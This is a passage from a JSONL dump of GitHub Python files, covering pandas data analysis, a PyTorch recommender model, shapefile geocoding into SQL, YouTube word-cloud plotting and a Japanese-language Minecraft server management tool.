June.\"\"\"\nrovaniemi_may=rovaniemi[rovaniemi['YR--MODAHRMN']//1000000==201705]\nkumpula_may=kumpula[kumpula['YR--MODAHRMN']//1000000==201705]\n\nrovaniemi_june=rovaniemi[rovaniemi['YR--MODAHRMN']//1000000==201706]\nkumpula_june=kumpula[kumpula['YR--MODAHRMN']//1000000==201706]\n\nprint(kumpula_june['TEMP'].mean())\nprint(rovaniemi_june['TEMP'].mean())\nprint(kumpula_may['TEMP'].mean())\nprint(rovaniemi_may['TEMP'].mean())\n#FIFTH\nprint(\"ANS OF FIFTH\")\n\"\"\" - create a new DataFrame where you have calculated mean, max and min temperatures for each day separately using the\n hourly values from Rovaniemi and Helsinki Kumpula.\n - this problem is a classical data aggregation problem\"\"\"\na.clear()\nb=rovaniemi[['YR--MODAHRMN','TEMP']]\nfor i in b['YR--MODAHRMN']:\n a.append(i//100)\nb['YR--MODAHRMN']=a\nc=b.groupby('YR--MODAHRMN')\na.clear()\nb=[]\nce=[]\nh=[]\nfor x,y in c:\n a.append(y['TEMP'].mean())\n b.append(y['TEMP'].max())\n ce.append(y['TEMP'].min())\n h.append(x)\nd=ps.DataFrame({\n 'hour':h,\n 'mean':a,\n 'max':b,\n 'min':ce\n})\nd\n","repo_name":"lusiferjr/Pandas","sub_path":"project_1/data_exploration.py","file_name":"data_exploration.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"26148430140","text":"class Diff2D:\n def __init__(self, m, n) -> None:\n self.m = m\n self.n = n\n\n self.diff = [[0]*(n+1) for _ in range(m+1)]\n self.result = [[0]*(n+1) for _ in range(m+1)]\n\n def set(self, x0, y0, x1, y1, val):\n \"\"\"\n top-left: (x0, y0)\n bottom-right: (x1, y1)\n \"\"\"\n diff = self.diff\n\n # 排容原理\n diff[x0][y0] += val\n diff[x0][y1+1] -= val\n diff[x1+1][y0] -= val\n diff[x1+1][y1+1] += val\n\n def compute(self):\n diff, result = self.diff, self.result\n\n # c b\n # a current\n result[0][0] = diff[0][0]\n for i in range(self.m):\n for j in range(self.n):\n a = result[i-1][j] if i-1 >= 0 else 0\n b = result[i][j-1] if j-1>= 0 else 0\n c = result[i-1][j-1] if i-1>=0 and j-1>=0 else 0\n result[i][j] = a + b - c + diff[i][j]\n","repo_name":"Vergil0327/leetcode-history","sub_path":"PrefixSum/DiffSum/2D-Difference Array/diff_2d.py","file_name":"diff_2d.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37414717731","text":"\"\"\"183. Customers Who Never Order\"\"\"\n\nimport pandas as pd\n\n\ndef find_customers(customers: pd.DataFrame, orders: pd.DataFrame) -> pd.DataFrame:\n result = customers[~customers.id.isin(orders[\"customerId\"])]\n\n result[\"Customers\"] = result[\"name\"]\n\n return result[[\"Customers\"]]\n","repo_name":"linzeyang/leetcode-solutions","sub_path":"easy/0183.py","file_name":"0183.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5648677389","text":"import numpy as np\nimport torch\nfrom torch import nn\n\n\nclass AutoRec(nn.Module):\n def __init__(self, num_user, latent_dim, dropout):\n super().__init__()\n self.encoder = nn.Linear(num_user, latent_dim)\n self.decoder = nn.Linear(latent_dim, num_user)\n self.dropout = nn.Dropout(dropout)\n self.relu = nn.ReLU()\n self.sig = nn.Sigmoid()\n\n def forward(self, x):\n out = self.encoder(x)\n # out = self.relu(out)\n out = self.sig(out)\n out = self.dropout(out)\n out = self.decoder(out)\n # out = self.relu(out)\n # Mask the gradient of unobserved user-item interaction during training\n if torch.is_grad_enabled():\n out = out * torch.sign(x)\n return out\n\n","repo_name":"gmsft/rec","sub_path":"models/AutoRec.py","file_name":"AutoRec.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70626828808","text":"import pandas as pd \nimport numpy \nimport scipy.stats as stats \nimport seaborn as sns\nimport matplotlib.pyplot as plot\n\nprint ('reading data file...')\ndata = pd.read_csv('nesarc_pds.csv', low_memory=False)\ndata.columns = map(str.upper, data.columns)\n\n# bug fix for display formats to avoid run time errors - put after code for loading data above\npd.set_option('display.float_format', lambda x:'%f'%x)\npd.set_option('display.max_rows', None)\n# Current drinkers(CONSUMER - DRINKING STATUS ) Either 1 (yes) or 2(no) to (S7Q31A - EVER DRANK ALCOHOL TO AVOID SOCIAL PHOBIA)\ndrinkerstemp=data[(data['CONSUMER'] ==1) & ((data['S7Q31A']=='1') | (data['S7Q31A']=='2'))]\n\n#Get rid of everything unneeded \ndrinkers = drinkerstemp[['S7Q31A','S2AQ8B','S2AQ8C','S2AQ10','S2BQ1A2','S2BQ1A4','S2BQ1A7', 'S2BQ1A8','S2BQ3B']].copy()\n\ndel drinkerstemp \ndel data\n\nfor col in drinkers: # Convert columns to numeric and replace 99's and nulls\n drinkers[col] = drinkers[col].convert_objects(convert_numeric=True)\n drinkers[col]=drinkers[col].replace(99 ,numpy.nan).fillna(numpy.nan)\n\nfor col in ['S2BQ1A2','S2BQ1A4','S2BQ1A7']: # Set missing values to Nan\n drinkers[col]=drinkers[col].replace(9 ,numpy.nan).fillna(numpy.nan)\n\ndrinkers['S7Q31A'] = drinkers['S7Q31A'].map({1:'SA',2:'NO_SA'}) # Give S7Q31A more intuitive names\n\n#PEARSON\n\ndrinkers_clean = drinkers[['S2BQ3B','S2AQ8B']].dropna()\n\nplt = sns.regplot(drinkers_clean['S2AQ8B'],drinkers_clean['S2BQ3B'])\nplt.set(xlabel='Number of drinks usually consumed', ylabel='Number of episodes of alcohol abuse')\n\nstats.pearsonr(drinkers_clean['S2BQ3B'],drinkers_clean['S2AQ8B'])\n\n#S2AQ10 - HOW OFTEN DRANK ENOUGH TO FEEL INTOXICATED IN LAST 12 MONTHS')\n#S2AQ8B NUMBER OF DRINKS OF ANY ALCOHOL USUALLY CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS\n#S2AQ8C LARGEST NUMBER OF DRINKS OF ANY ALCOHOL CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS\n\n#S2BQ1A2 - EVER HAD TO DRINK MORE TO GET THE EFFECT WANTED')\n#S2BQ1A4 - EVER INCREASE DRINKING BECAUSE AMOUNT FORMERLY CONSUMED NO LONGER GAVE DESIRED EFFECT')\n#S2BQ1A7 - EVER HAVE PERIOD WHEN ENDED UP DRINKING MORE THAN INTENDED')\n#S2BQ1A8 - EVER HAVE PERIOD WHEN KEPT DRINKING LONGER THAN INTENDED') \n#S2BQ3B - NUMBER OF EPISODES OF ALCOHOL ABUSE)\n","repo_name":"jamesrmccallum/Coursera","sub_path":"Pearson/Corr_Co.py","file_name":"Corr_Co.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18526785989","text":"import pandas as pd\nimport numpy as np\nimport string\nfrom collections import Counter\nfrom PIL import Image\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport sys\nimport dateutil.parser\nimport isodate\nimport scipy.stats as stats\nimport datetime\nfrom matplotlib.gridspec import GridSpec\n\ndef pareto_plot(df, \n x=None, \n y=None, \n title=None, \n number_categories = 10, \n show_pct_y=False, \n pct_format='{0:.0%}'):\n \n '''adapted from mostly from https://tylermarrs.com/posts/pareto-plot-with-matplotlib/ except as indicated'''\n\n import matplotlib.pyplot as plt\n\n dfplot = df[[x,y]]\n\n dfsorted = dfplot.sort_values(y, ascending=False)\n \n df_shortened = dfsorted[0:number_categories] #added for when there are too many categories to plot\n df_remaining = dfsorted[number_categories:df.shape[0]]\n \n xlabel = x\n ylabel = y\n tmp = df_shortened.sort_values(y, ascending=False)\n tmp = tmp.append({x : 'Other' , y : df_remaining[y].abs().sum()}\n , ignore_index=True) #adds in an other category which has the sum of the remainder\n x = tmp[x].values\n y = tmp[y].values\n weights = y / y.sum()\n cumsum = weights.cumsum()\n\n \n fig, ax1 = plt.subplots(figsize = (6,6)) #figsize adjusted to account for rotated labels\n ax1.bar(x, y)\n ax1.set_xlabel(xlabel)\n ax1.tick_params(axis = 'x', rotation = 90) #rotation for longer category names\n ax1.set_ylabel(ylabel)\n \n ax2 = ax1.twinx()\n #ax2.ylim(0, 1.0) \n ax2.plot(x, cumsum, '-ro', alpha=0.5)\n ax2.set_ylabel('', color='r')\n ax2.tick_params('y', colors='k', rotation = 'auto')\n ax2.set_ylim([0,1])\n \n \n vals = ax2.get_yticks()\n ax2.set_yticklabels(['{:,.2%}'.format(x) for x in vals])\n\n # hide y-labels on right side\n if not show_pct_y:\n ax2.set_yticks([])\n \n formatted_weights = [pct_format.format(x) for x in cumsum]\n for i, txt in enumerate(formatted_weights):\n ax2.annotate(txt, (x[i], cumsum[i]), fontweight='heavy') \n \n if title:\n plt.title(title)\n \n plt.tight_layout()\n plt.show();\n\ndef sorted_bar_plot(df,x,y):\n\n dfplot = df[[x, y]]\n dfsorted = dfplot.sort_values(y, ascending=False)\n\n #dfplot.head()\n\n xlabel = x\n ylabel = y\n\n x = dfsorted[x].values\n y = dfsorted[y].values\n\n fig, ax = plt.subplots(figsize = (12, 6))\n\n ax.bar(x,y)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.tick_params(axis = 'x', rotation = 90)\n\ndef plot_relationships(df, x, y, title=None, xlim=None, ylim=None):\n '''x vs y scatterplot with an uneccesarily complicated name\n '''\n xlabel = x\n ylabel = y\n \n dfplot = df[[x,y]]\n \n \n x = dfplot[x].values\n y = dfplot[y].values\n \n fig, ax1 = plt.subplots(figsize = (6,6))\n ax1.plot(x, y, 'o')\n ax1.set_xlabel(xlabel)\n ax1.set_ylabel(ylabel)\n ax1.set_title(title)\n ax1.set_xlim(xlim)\n ax1.set_ylim(ylim)\n\ndef label_points(x, y, val, ax='ax'):\n '''labels points on a scatterplot\n '''\n a = pd.concat({'x': x, 'y': y, 'val': val}, axis=1)\n for i, point in a.iterrows():\n ax.text(point['x'], point['y'], str(point['val']))\n\ndef plot_with_line_of_fit(df,x,y,title=None):\n '''produces an x vs y scatter plot with a linear line of best fit\n '''\n xlabel = x\n ylabel = y\n \n dfplot = df[[x,y]]\n \n x = dfplot[x].values\n y = dfplot[y].values\n \n slope, intercept, r_value, p_value, std_err = stats.linregress(\n x,\n y)\n\n line = slope*x+intercept\n\n\n fig, ax1 = plt.subplots(figsize = (6,4))\n ax1.plot(x, y, 'o')\n ax1.set_xlabel(xlabel)\n ax1.set_ylabel(ylabel)\n ax1.set_title(title)\n 
ax1.plot(x, line)\n\ndef line_of_fit(df, x, y):\n \n dfplot = df[[x,y]]\n \n x = dfplot[x].values\n y = dfplot[y].values\n \n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n \n line = slope*x + intercept\n \n return line\n\ndef word_count(df, col):\n '''while this is used to make a word count, it really just generates three\n lists of words.\n Index 0 = all words in a list of lists\n Index 1 = all words in a singe, flat list\n Index 2 = unique list of words\n '''\n words = []\n for i in df[col]:\n lowercase = str(i).lower()\n separate = lowercase.split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in separate]\n words.append(no_punctuation) \n\n flat_words = []\n for sublist in words:\n for item in sublist:\n flat_words.append(item)\n \n unique_words = np.unique(flat_words)\n \n return words, flat_words, unique_words\n\ndef make_wordcloud(df, col):\n '''adapted from https://www.datacamp.com/community/tutorials/wordcloud-python\n '''\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud = WordCloud(max_font_size=50,\n max_words=100,\n stopwords=stopwords,\n background_color=\"white\").generate(' '.join(word_count(df,col)[1]))\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig, ax = plt.subplots(figsize=(10,15))\n \n ax.imshow(wordcloud, interpolation='bilinear')\n ax.imshow(wordcloud, interpolation='bilinear')\n ax.axis(\"off\")\n\nvideo_deets_df = pd.read_csv('../data/video_deets_df.csv')\n\ntitle_dict = {}\nfor i in video_deets_df['channelTitle'].unique():\n value = i.lower().split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in value]\n title_dict[i] = no_punctuation\n\nflat_title_words = []\nfor sublist in list(title_dict.values()):\n for item in sublist:\n flat_title_words.append(item)\nunique_title_words = list(np.unique(flat_title_words))\n\ndef word_count_omit_words(df, col, omit_words = title_dict):\n '''Something in this function doesn't quote work, but the intention was to\n use this, for instance, to make a word cloud of words that are in the video\n title, but NOT in the channel titel.\n '''\n words = []\n for i in df[col]:\n lowercase = str(i).lower()\n separate = lowercase.split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in separate]\n for j in no_punctuation:\n if j not in omit_words:\n words.append(no_punctuation) \n\n flat_words = []\n for sublist in words:\n for item in sublist:\n flat_words.append(item)\n \n unique_words = np.unique(flat_words)\n \n return words, flat_words, unique_words\n\ndef make_wordcloud_omit_words(df, col):\n '''Accompanying function to word_count_omit_words\n adapted from https://www.datacamp.com/community/tutorials/wordcloud-python\n '''\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud = WordCloud(max_font_size=50,\n max_words=100,\n stopwords=stopwords,\n background_color=\"white\").generate(' '.join(word_count_omit_words(df,col)[1])\n )\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig, ax = plt.subplots(figsize=(10,15))\n \n ax.imshow(wordcloud, interpolation='bilinear')\n ax.imshow(wordcloud, 
interpolation='bilinear')\n ax.axis(\"off\")\n\ndef create_sub_df(chan,col):\n video_title_df = video_deets_df[['channelTitle',col,'viewCount']]\n data = video_title_df[video_title_df['channelTitle']==chan]\n data = data[[col,'viewCount']]\n data_dict = {}\n\n for i, row in data.iterrows():\n data_dict[i] = [row['viewCount'],row[col].lower().split()]\n \n return data, data_dict\n\ndef top_videos_per_channel(chan, quant):\n '''Returns the top quant % videos from channel = chan'''\n df = video_deets_df[(video_deets_df.channelTitle == chan) & \n (video_deets_df.viewCount > \n np.quantile(video_deets_df[video_deets_df.channelTitle == chan].viewCount,\n quant))].sort_values(by='viewCount', ascending=False)\n return df\n\ndef wordcloud_all_vs_top_words_per_channel(df, chan, col, quant):\n #### from https://www.datacamp.com/community/tutorials/wordcloud-python\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud1 = WordCloud(max_font_size=50,\n max_words=50,\n stopwords=stopwords,\n background_color=\"white\").generate(\n ' '.join(word_count(video_deets_df[video_deets_df.channelTitle == chan]\n ,col)[1])\n )\n wordcloud2 = WordCloud(max_font_size=50,\n max_words=50,\n stopwords=stopwords,\n background_color=\"white\").generate(\n ' '.join(word_count(video_deets_df[(video_deets_df.channelTitle == chan) & \n (video_deets_df.viewCount > \n np.quantile(video_deets_df[video_deets_df.channelTitle == chan].viewCount,\n quant))].sort_values(by='viewCount', ascending=False)\n ,col)[1])\n )\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig = plt.figure(figsize=(12,12))#subplots(1,2, figsize=(12,12))\n fig.suptitle(\"Most Popular Words in {} from {}\".format(col, chan), y=.65, fontsize=18)\n gs = fig.add_gridspec(1, 2)\n \n ax1 = fig.add_subplot(gs[0, 0])\n ax1.imshow(wordcloud1, interpolation='bilinear')\n ax1.axis(\"off\")\n ax1.set_title('All Videos')\n \n ax2 = fig.add_subplot(gs[0, 1])\n ax2.imshow(wordcloud2, interpolation='bilinear')\n ax2.axis(\"off\")\n ax2.set_title('{}% Most Popular Videos'.format(round((1-quant)*100)))\n\ndef channel_hist(chan, mostviews, quant):\n \n data = create_sub_df(chan,'videoTitle')[0].viewCount\n \n fig, ax = plt.subplots()\n\n N, bins, patches = ax.hist(data,\n edgecolor='white', \n linewidth=1, \n bins = 30,\n range = (0,mostviews))\n\n for patch, leftside, rightside in zip(patches, bins[:-1], bins[1:]):\n if rightside > np.percentile(data,quant):\n patch.set_facecolor('r')\n \n ax.set_xlabel('Views')\n ax.tick_params(axis = 'x', rotation = 90)\n ax.set_ylabel('Video Count')\n ax.set_title('Distribution of Views for {}'.format(chan))","repo_name":"scottfeldmanpeabody/MTB-YouTube-EDA","sub_path":"src/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":11308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42195509665","text":"import mysql.connector\nimport ogr\nimport pycountry\nimport dbconfig\n\n# find cities without geo information in db, and add geo info via ESRI\n\n# because getting the data from db takes some time, we cache it in a file\n# called 'cities_nogeo.p'\n\ndb = mysql.connector.connect(user=dbconfig.user, password=dbconfig.password\n\t\t\t\t\t\t\t, host='localhost', database = 'bt')\n\ncursor = db.cursor(buffered = True)\n\nsql = (\"SELECT f_city, f_country FROM ot WHERE f_lon IS NULL AND f_lat IS NULL AND f_city IS NOT NULL AND f_country IS NOT NULL GROUP BY f_lon, f_lat, f_city, f_country;\")\n\ncursor.execute(sql)\nresult = cursor.fetchall()\ndata = [row for row in result]\n\ncursor.close()\ndb.close()\n\t\ndrv = ogr.GetDriverByName('ESRI Shapefile')\nds2_in = drv.Open(\"shapes/gadm28_adm2.shp\")\nlyr2_in = ds2_in.GetLayer(0)\nds3_in = drv.Open(\"shapes/gadm28_adm3.shp\")\nlyr3_in = ds3_in.GetLayer(0)\nds4_in = drv.Open(\"shapes/gadm28_adm4.shp\")\nlyr4_in = ds4_in.GetLayer(0)\n\ndef checkCity(layer, field, data):\n\tfound = []\n\tfailed = []\n\tfor (city, country) in data:\n\t\tc3 = pycountry.countries.get(alpha_2=country).alpha_3\n\t\tf = False\n\t\tfor feature in layer:\n\t\t\tcityname = feature.GetField(field)\n\t\t\tiso = feature.GetField('ISO')\n\t\t\tif (iso == c3 and cityname is not None and cityname.decode('utf-8') == city):\n\t\t\t\tgeo = feature.GetGeometryRef().Centroid()\n\t\t\t\tfound.append((city, country, geo)) \n\t\t\t\tf = True\n\t\tlayer.ResetReading()\n\t\tif not f:\n\t\t\tfailed.append((city, country))\n\n\treturn {'found':found,'notfound':failed}\n\t\n# we test against different types of municipalities and districts\n# orders matters, we want to go from smaller to bigger units\nassigned = []\nresult = checkCity(lyr4_in, 'NAME_4', data)\nassigned = assigned + result['found']\nresult = checkCity(lyr3_in, 'NAME_3', result['notfound'])\nassigned = assigned + result['found']\nresult = checkCity(lyr2_in, 'NAME_2', result['notfound'])\nassigned = assigned + result['found']\n\ndoublette = []\nsingle = []\nfor obj in assigned:\n\tfound = False\n\tfor s in single:\n\t\tif obj[0] == s[0]:\n\t\t\tfound = True\n\tif found:\n\t\tdoublette.append(obj)\n\telse:\n\t\tsingle.append(obj)\n\nfor d in doublette:\n\tfor s in single:\n\t\tif d[0] == s[0]:\n\t\t\tsingle.remove(s)\n\t\t\tdoublette.append(s)\n\n\nfh = open('generated/207_addlonlat.sql','wb')\nfor point in single:\n\tsql = (\"UPDATE ot SET f_lat = {}, f_lon = {} \"\n\t\t\t\"WHERE f_country = '{}' AND f_city = '{}';\\n\")\n\tfh.write(sql.format(round(point[2].GetY(),5), round(point[2].GetX(),5), point[1], point[0].encode('utf-8')))\nfh.close()\n\nfh = open('generated/207_addlonlat_manual.sql','wb')\nfor point in doublette:\n\tsql = (\"/* UPDATE ot SET f_lat = {}, f_lon = {} \"\n\t\t\t\"WHERE f_country = '{}' AND f_city = '{}';*/\\n\")\n\tfh.write(sql.format(round(point[2].GetY(),5), round(point[2].GetX(),5), point[1], point[0].encode('utf-8')))\nfh.close()","repo_name":"GolemMediaGmbH/OfficeTemperatureData","sub_path":"02_geochecks/207_checkcity_without_geo.py","file_name":"207_checkcity_without_geo.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"16"}
+{"seq_id":"40949149275","text":"import subprocess\nimport linecache\nimport platform\nimport shutil\nimport time\nimport sys\nimport os\n\n\"\"\"自作プログラムの読み込み\"\"\"\nfrom Server import make\nfrom Server import proxy as proxy_program\nfrom Etc import etc\nfrom Etc import check\n\ndef exec_java(dir_name, jar_name, xms, xmx, java_argument=\"\"):\n \"\"\"javaを実行するための関数\"\"\"\n # もし入力内容が0かnotだったら1(1GB)に\n cmd = \"java -Xmx\"+xmx+\"G -Xms\"+xms+\"G -jar ./\"+jar_name+\" \"+java_argument\n subprocess.call(cmd, shell=True, cwd=dir_name+\"/\")\n\ndef select_server():\n \"\"\"サーバーを選択する関数\"\"\"\n minecraft_server_list_txt_lines_count = sum(\n [1 for _ in open('data/minecraft-list.txt', encoding=\"utf-8\")])\n minecraft_server_dir_list_txt_lines_count = sum(\n [1 for _ in open('data/minecraft-dir-list.txt', encoding=\"utf-8\")])\n if not minecraft_server_dir_list_txt_lines_count == minecraft_server_list_txt_lines_count:\n print(\"txtファイルの行数が合わないため、続行できません。\")\n sys.exit(1)\n while True:\n with open(\"data/minecraft-list.txt\", \"r\", encoding=\"utf-8\") as file:\n lines = file.read()\n print(lines)\n choice_lines = input(\"サーバーの番号を入力してください: \")\n if not choice_lines or not choice_lines.isdigit():\n continue\n if int(minecraft_server_dir_list_txt_lines_count) < int(choice_lines):\n continue\n break\n return choice_lines\n\ndef start_server():\n \"\"\"サーバーを実行するための `準備` 関数\"\"\"\n print(\"サーバー起動モード\")\n print(\"起動するサーバーを選んでください\\n\")\n choice_server = select_server()\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n if not os.path.exists(path+\"/\"+start_jar):\n if os.path.exists(path+\"/\"+start_jar.replace(\".jar\", \"\")+\"-universal.jar\"):\n start_jar = start_jar.replace(\".jar\", \"\")+\"-universal.jar\"\n else:\n print(\"起動できません。\\nJarファイルが存在しません。\")\n sys.exit(6)\n exec_java(path, start_jar, mem_input[0], mem_input[1], java_argument=\"nogui\")\n\ndef change_port():\n \"\"\"サーバーのポートを再設定する関数\"\"\"\n print(\"サーバーポート変更モード\")\n print(\"ポートを変更する、サーバーを選択してください。\")\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n while True:\n input_port = input(\"再設定するポートを入力してください: \")\n if not input_port or not str.isnumeric(input_port):\n continue\n else:\n break\n make.file_identification_rewriting(path+\"/server.properties\",\n \"server-port=\", \"server-port=\"+input_port+\"\\n\")\n print(\"サーバーのポートを���更しました。\")\n\ndef change_max_player():\n \"\"\"最大参加人数を変更する関数\"\"\"\n print(\"サーバー最大参加人数の変更モード\")\n print(\"最大参加人数を変更したいサーバーを選択してください。\")\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n while True:\n input_max_player = input(\"再設定する最大参加人数を入力してください: \")\n if not input_max_player.isdigit():\n continue\n break\n \n make.file_identification_rewriting(path+\"/server.properties\", \"max-players=\", \"max-players=\"+input_max_player+\"\\n\")\n print(\"サーバーの最大参加人数を変更しました。\")\n\ndef add_startup():\n \"\"\"スタートアップ(LinuxではSystemdなど)にMinecraftを実行するbat-shファイルを登録する関数\"\"\"\n print(\"OS起動時 自動起動 設定モード\")\n check.is_admin()\n 
print(\"設定したいサーバーを選択してください。\")\n user_use_platfrom = platform.system()\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n absolute_path = os.path.abspath(path)\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n if user_use_platfrom == \"Windows\":\n try:\n file = open(\"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/minecraft\"+path.replace('/', '').replace('minecraft', '')+\".bat\", mode='w')\n file.write(\"java -Xms{xms}G -Xmx{xmx}G -jar {abspath}/{jar_file} nogui \\n\\\n pause\".format(xms = choice_xms, xmx = choice_xmx, abspath = absolute_path, jar_file = start_jar))\n file.close()\n except Exception as excep:\n check.except_print(excep, \"\", True)\n elif user_use_platfrom == \"Linux\":\n if not shutil.which('systemctl'):\n print(\"コマンド:Systemctlが見つかりません\")\n sys.exit(4)\n try:\n file = open(\"/etc/systemd/system/minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\", mode='w')\n file.write(\"[Unit] \\\n \\nDescription=Minecraft Server: %i \\\n \\nAfter=network.target \\\n \\n[Service] \\\n \\nWorkingDirectory={woking_dir} \\\n \\nRestart=always \\\n \\nExecStart=/usr/bin/java -Xms{xms}G -Xmx{xmx}G -jar {jar_file} nogui \\\n \\n[Install] \\\n \\nWantedBy=multi-user.target\".format(woking_dir = absolute_path, xms = choice_xms, xmx = choice_xmx, jar_file = start_jar))\n file.close()\n subprocess.run(\"sudo systemctl daemon-reload\", shell=True)\n time.sleep(0.8)\n subprocess.run(\"sudo systemctl enable minecraft\"+path.replace('/', '').replace('minecraft', ''), shell=True)\n except Exception as excep:\n check.except_print(excep, \"\", True)\n else:\n print(\"その、OSは対応していません\")\n sys.exit(6)\n print(\"完了しました!\")\n\ndef del_startup():\n print(\"スタートアップ(自動起動設定)の削除\")\n check.is_admin()\n print(\"設定したいサーバーを選択してください。\")\n while True:\n user_use_platfrom = platform.system()\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n windows_startup_path = \"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/\"\n linux_startup_path = \"/etc/systemd/system/\"\n if os.path.exists(linux_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\") or os.path.exists(windows_startup_path + \"minecraft\" + path.replace('/', '').replace('minecraft', '') + \".bat\"):\n if user_use_platfrom == \"Windows\":\n try:\n os.remove(windows_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".bat\")\n except Exception as excep:\n check.except_print(excep, \"\", True)\n elif user_use_platfrom == \"Linux\":\n try:\n if not shutil.which('systemctl'):\n print(\"コマンド:Systemctlが見つかりません\")\n sys.exit(4)\n os.remove(linux_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\")\n subprocess.run(\"sudo systemctl daemon-reload\", shell=True)\n except Exception as excep:\n check.except_print(excep, \"\" , True)\n print(\"完了しました!\")\n else:\n print(\"その、サーバーは自動起動設定がされていません\")\n continue\n break\n\ndef make_sh():\n \"\"\"shとbatファイルを生成する関数\"\"\"\n choice_lines = select_server()\n path = 
linecache.getline('data/minecraft-dir-list.txt', int(choice_lines)).replace('\\n', '')\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n file_name = [\"start.sh\", \"start.bat\"]\n for i in file_name:\n with open(path+\"/\"+i, 'w', encoding=\"utf-8\") as file:\n print(\"echo Start!\\n\",\n \"java -Xms\"+mem_input[0]+\"G\",\n \" -Xmx\"+mem_input[1]+\"G\",\n \" -jar \"+start_jar+\" --nogui\", file=file, sep='')\n print(\"sh-batファイルを作成しました。\")\n\ndef proxy():\n print(\"サーバープロキシモード\")\n local_host = \"127.0.0.1\"\n while True:\n local_port = input(\"出力するポートを入力してください: \")\n if not local_port.isdigit():\n continue\n break\n remote_host = input(\"元のサーバーのホスト名を入力してください: \")\n while True:\n remote_port = input(\"元のサーバーのポート番号を入力してください: \")\n if not remote_port.isdigit():\n continue\n break\n proxy_program.server_loop(local_host, int(local_port), remote_host, int(remote_port))\n print(\"接続が切断されました\")\n\ndef network_info():\n \"\"\"ネットワークのIPなどを確認できる関数\"\"\"\n print(\"\\n注意: IPを公開するのは、危険度が高いです。\\n\",\n \"IPアドレスは重要な情報です。(電話番号のようなものです。) \\n\",\n \"もし、あなたが配信やIPアドレスを見せたくない状況の場合には表示しないことをおすすめします。\",\n \"\\n`yes` か `no`を選択してください。\\n[Y/N]: \")\n network_info_select = etc.input_yes_no(\"\")\n if not network_info_select:\n return False\n active, global_ip, private_ip = check.network(\"https://ifconfig.me\")\n if not active:\n global_ip = \"取得できません。\"\n print(\"プライベートIP (同じネットワークで参加するために必要です。)\"+private_ip)\n print(\"グローバルIP 